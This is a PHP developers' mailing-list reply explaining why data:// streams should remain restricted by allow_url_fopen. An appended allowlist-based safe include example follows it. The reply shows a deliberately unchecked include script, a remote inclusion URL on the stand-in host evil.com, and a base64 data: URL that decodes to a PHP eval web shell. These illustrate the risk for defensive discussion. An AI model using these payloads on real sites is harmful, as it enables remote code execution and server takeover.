Re: data stream restricted by allow_url_fopen (Bug #47336)
On 11/03/13 12:36, Christian Stoller wrote:
> Hi Stas.
>> I'm afraid it is not a good idea. allow_url_fopen is meant to protect
>> file functions (fopen and friends) from being injected with
>> user-controlled data - i.e. if you control the filesystem and you do
>> fopen() under allow_url_fopen then it is reasonable to assume the data
>> under that filename is under your control. However, data:// URLs clearly
>> violate this assumption no less than http:// URLs do - data: just does
>> it without even requiring a web server.
> I am unsure whether I understand you. As far as I know with the data:// stream PHP does not
> access any file on the filesystem. It's just for transforming normal content in a variable to a
> resource, or not? So I do not see any risk. Maybe you can give me an example.
Suppose you had the silly script:
<?php
$file = $_GET['file'];
include $file . ".php";
As there's no check at all on $file, an attacker could pass in the URL
&file=http://evil.com/backdoor-code and PHP would happily run the PHP
code located at http://evil.com/backdoor-code.php
If include of data URLs is enabled, the attacker could do the same with
&file=data:image/png;base64,PD9waHAgZXZhbCgkX0dFVFsiY29kZSJdKTsgPz4K
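A hardened counterpart to the script in the message above, as an added example that is not part of the original thread: the request value is looked up in an allowlist and never concatenated into the include path, so http:// and data: values are rejected regardless of the ini settings. The page names, directory layout and sample inputs are hypothetical and constructed for illustration.

```php
<?php
declare(strict_types=1);

// Hypothetical allowlist: request value => file name inside the pages directory.
const ALLOWED_PAGES = ['home' => 'home.php', 'about' => 'about.php'];

/**
 * Map a user-supplied page name to a file to include, or null if rejected.
 * The request value is only ever used as an array key, never as part of a
 * path, so stream wrappers (http://, data:) and "../" cannot reach include.
 */
function resolve_page(string $requested, string $pagesDir): ?string
{
    if (!array_key_exists($requested, ALLOWED_PAGES)) {
        return null;
    }
    $base = realpath($pagesDir);
    $path = realpath($pagesDir . '/' . ALLOWED_PAGES[$requested]);
    if ($base === false || $path === false) {
        return null; // pages directory or page file is missing
    }
    // Defence in depth: the resolved path (after symlinks) must stay inside $base.
    $prefix = $base . DIRECTORY_SEPARATOR;
    return strncmp($path, $prefix, strlen($prefix)) === 0 ? $path : null;
}

// Demo: throwaway pages directory and constructed request values.
$dir = sys_get_temp_dir() . '/pages_' . bin2hex(random_bytes(4));
mkdir($dir);
file_put_contents($dir . '/home.php', "<?php echo 'home page', PHP_EOL;");

$inputs = [
    'home',
    'http://example.invalid/remote',
    'data:text/plain;base64,aGVsbG8=',
    '../../etc/passwd',
];
foreach ($inputs as $input) {
    $target = resolve_page($input, $dir);
    if ($target === null) {
        echo "rejected: $input", PHP_EOL;
        continue;
    }
    include $target; // only ever a fixed file from the allowlist
}

unlink($dir . '/home.php');
rmdir($dir);
```

Only `home` resolves to a file; the other three values are rejected before `include` is reached.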